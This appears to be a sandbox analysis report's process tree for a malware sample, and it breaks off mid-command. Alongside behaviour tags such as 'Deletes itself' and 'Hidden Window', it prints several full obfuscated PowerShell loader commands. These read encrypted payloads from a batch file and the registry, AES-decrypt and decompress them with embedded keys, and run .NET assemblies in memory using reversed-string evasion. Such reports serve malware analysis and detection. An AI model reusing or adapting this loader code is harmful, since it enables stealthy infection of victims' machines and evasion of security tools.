C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2984
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3292
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3424
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function lXUcN($NcmdG){ $ZNBwE=[System.Security.Cryptography.Aes]::Create(); $ZNBwE.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZNBwE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZNBwE.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HNqitIpHrhFARvFSHzYiIMCV8zsJdtJ13c58RfpaiVk='); $ZNBwE.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e9o/NMh8sZbD8255zk7X7A=='); $aQXue=$ZNBwE.CreateDecryptor(); $return_var=$aQXue.TransformFinalBlock($NcmdG, 0, $NcmdG.Length); $aQXue.Dispose(); $ZNBwE.Dispose(); $return_var;}function AFlSx($NcmdG){ $mcaON=New-Object System.IO.MemoryStream(,$NcmdG); $KYaKt=New-Object System.IO.MemoryStream; $mzipE=New-Object System.IO.Compression.GZipStream($mcaON, [IO.Compression.CompressionMode]::Decompress); $mzipE.CopyTo($KYaKt); $mzipE.Dispose(); $mcaON.Dispose(); $KYaKt.Dispose(); $KYaKt.ToArray();}function dYVlV($NcmdG,$Nedin){ $hWSci=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$NcmdG); $jhjWM=$hWSci.EntryPoint; $jhjWM.Invoke($null, $Nedin);}$ADJIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($lvGEz in $ADJIG) { if ($lvGEz.StartsWith(':: ')) { $Ecxmz=$lvGEz.Substring(3); break; }}$eSebZ=[string[]]$Ecxmz.Split('\');$HLWdG=AFlSx (lXUcN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eSebZ[0])));$hvZbu=AFlSx (lXUcN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eSebZ[1])));dYVlV $hvZbu (,[string[]] (''));dYVlV $HLWdG (,[string[]] (''));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr 